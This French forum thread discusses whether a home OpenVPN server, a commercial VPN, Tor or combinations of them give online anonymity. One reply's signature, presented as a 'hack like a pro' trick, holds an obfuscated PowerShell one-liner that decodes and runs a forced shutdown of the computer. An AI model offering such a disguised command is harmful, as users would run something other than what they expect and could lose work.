Annonce

Réduire
Aucune annonce.

créer son propre serveur vpn ?

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • créer son propre serveur vpn ?

    Bonjour à tous, je dispose d'un vieil ordinateur qui pourrait éventuellement être transformé en un petit serveur vpn, (sous openvpn) ce qui posséderait de nombreux avantages : (corrigez-moi si je me trompe bien sûr)

    -Je contrôle entièrement mes données, et je n'ai plus à me poser la question du "mes logs sont-ils conservés ?...";

    -Plus de limitation de bande passante (à moins d'avoir envie de limiter ma propre connexion);

    -Pas d'informations personnelles à fournir (car pas d'inscription à un service, etc.)

    -Et bien sûr, c'est gratuit

    J'ai donc trouvé ce tutoriel sur le fameux site du zéro, nommé OpenClassroom désormais : https://openclassrooms.com/fr/course...-avec-open-vpn

    Et je me pose alors plusieurs questions :

    -Ce tutoriel est-il de bonne qualité ?... Il me semble à vue d'oeil que c'est le cas, mais autant avoir l'avis de personnes plus expérimentées

    -Un vpn "maison" est-il aussi sécurisé qu'un vpn par abonnement, comme NordVpn ?...

    -En supposant que je ne veuille pas payer pour un vpn, vaut-il alors mieux passer par le réseau Tor plutôt que par mon propre vpn ?

    Merci d'avance pour vos réponses

  • #2
    Salut,

    C'est quoi l'objectif de ta démarche ?
    Si c'est dans un souci d’anonymat et que tu héberges le serveur chez toi, ça n'a aucun intérêt...

    Si c'est pour protéger l'accès distant à certains services que tu héberges chez toi, alors oui, c'est cool.

    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Ce serait plutôt dans un souci d'anonymat en effet, mais si ça serait inutile, quelle solution ferais-je mieux d'employer ? Un vpn commercial, ou le réseau Tor, chacun ayant ses avantages... et ses défauts évidemment

      Commentaire


      • #4
        Salut,

        Comme l'a dis Krisscool si tu met le VPN chez toi ça n'a aucun intérêt. En effet, un VPN ça ne cache pas ton identité. Ça fait simplement un pont avec un réseau local distant. L'usage a été détourné pour de l'anonymat mais à la base ce n'est pas l'utilité principale.

        Pour ton anonymat le "mieux" reste de passer par un VPN commercial + TOR (+ VPN commercial si possible). Après c'est un débat sans fin, comme tu l'as dis, chaque solution a ses avantages et inconvenants.

        Pour avoir déjà étudier le sujet, selon moi, la vrai question à se poser avant de réfléchir à des solutions c'est: De qui/quoi veux tu te protéger? En effet, tu ne vas pas employer les mêmes méthodes si tu cherche simplement à télécharger en torrent ou si tu cherche à pirater le FBI.

        Commentaire


        • #5
          On peut aussi voir du côté de I2P...

          EDIT 1: Un article intéressant !
          EDIT 2: On peut utiliser un système d'exploitation spécifique à cet usage, Tails ou liberte
          Dernière modification par fred, 23 octobre 2018, 20h50.

          Commentaire


          • #6
            Merci beaucoup pour toutes vos réponses, mais l'usage de Tor + un vpn ne risque-t-il pas au contraire de causer des problèmes de confidentialités qu'avec un usage seul ? Et merci fred pour tes liens

            Commentaire


            • #7
              Quand tu passes par TOR tu as 2 elements qui peuvent compromettres ton anonymat:
              - Le noeud d'entre
              - Le noeud de sortie

              Si tu ne prend pas de VPN pour acceder a TOR:
              - Ton traffic n'est pas crypte donc "tout le monde" sais que tu vas sur TOR
              - Le noeud d'entre peu sniffer ton traffic (et retrouver ton IP)
              - Ton traffic de sortie n'est pas crypte. Donc le noeud de sorti peut sniffer ton traffic

              Si tu prend VPN + TOR:
              - Ton traffic est crypte jusqu'au fournisseur VPN. Donc ton FAI (entre autre) ne sais pas que tu passe par TOR
              - Mise a part ton fournisseur VPN personne ne sais que tu passe par TOR
              - Ton traffic de sortie n'est pas crypte. Donc le noeud de sorti peut sniffer ton traffic

              Si tu prend VPN + TOR + VPN:
              - Ton traffic est crypte jusqu'au fournisseur VPN. Donc ton FAI (entre autre) ne sais pas que tu passe par TOR
              - Mise a part ton fournisseur VPN personne ne sais que tu passe par TOR
              - Ton traffic de sortie est crypte jusqu'au fournisseur VPN

              On en reviens donc a la question initial: Peut on faire confiance aux fournisseurs VPN commerciaux?

              Si tu veux avoir un anonymat maximum, (d'apres moi) le mieux est encore de passer par des points acces publiques et de se connecter ensuite a un VPN commercial paye anonymement et pourquoi pas passer par TOR derriere tout ca.

              Encore une fois tout depend de qui/quoi tu cherches a te cacher. En fonction de ca tu n'utilisera pas les memes procedes.
              Si tu veux reflechir a ca, demande toi quels sont les moyens/perimetre d'action de qui/quoi tu veux te proteger. En fonction de ca tu pourra certainement trouver la solution adequat

              Commentaire


              • #8
                Merci beaucoup pour tes explications, mais si je comprend comment on pourrait ajouter un vpn à Tor (on lance le vpn, puis on se connecte au réseau Tor), comment ajouter un vpn supplémentaire, en sachant que notre adresse ip va changer plusieurs fois dans le réseau Tor ?

                Commentaire


                • #9
                  Un VPN gratuit qui suffit tant que tu ne fais rien qui attirerait l'attention d'interpol : Windscribe. je crois qu'il y a des codes promo... J'ai 15go/mois gratuit !

                  Commentaire

                  Chargement...
                  X